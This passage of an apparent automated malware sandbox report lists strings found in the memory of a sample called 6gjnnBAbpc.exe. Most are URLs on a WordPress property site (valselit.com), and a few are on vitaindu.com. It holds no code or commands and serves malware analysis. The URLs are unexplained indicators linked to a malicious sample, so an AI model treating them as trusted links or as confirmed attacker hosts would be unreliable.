6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2022/12/image_20210920_231753_527-768x512.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2022/12/image_20210920_231753_527.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2022/12/image_20210921_202844_701-1024x683.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2022/12/image_20210921_202844_701-300x200.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2022/12/image_20210921_202844_701-768x512.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2022/12/image_20210921_202844_701.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/labsense/appartement-a-vendre/image_20210920_231701_126.j
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/labsense/appartement-a-vendre/image_20210920_231759_603.j
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/labsense/appartement-a-vendre/image_20210921_202756_533.j
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/labsense/appartement-a-vendre/image_20210921_202845_707.j
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/labsense/appartement-a-vendre/image_20210921_203320_2064.
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/labsense/maison-a-vendre/10198_hflip.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/labsense/maison-a-vendre/10533_hflip.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/labsense/maison-a-vendre/10653_hflip.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/css/dist/block-library/style.min.css?ver=6.0.3
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/wlwmanifest.xml
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.378655055.0000000008D7D000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.541499970.0000000008D5B000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.333008412.0000000008D55000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-json/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/xmlrpc.php?rsd
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.541446010.0000000008E09000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000002.669997099.0000000008E06000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.535847539.0000000008E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vitaindu.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.669997099.0000000008E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vitaindu.com/x-
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.325497918.000000000A2D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 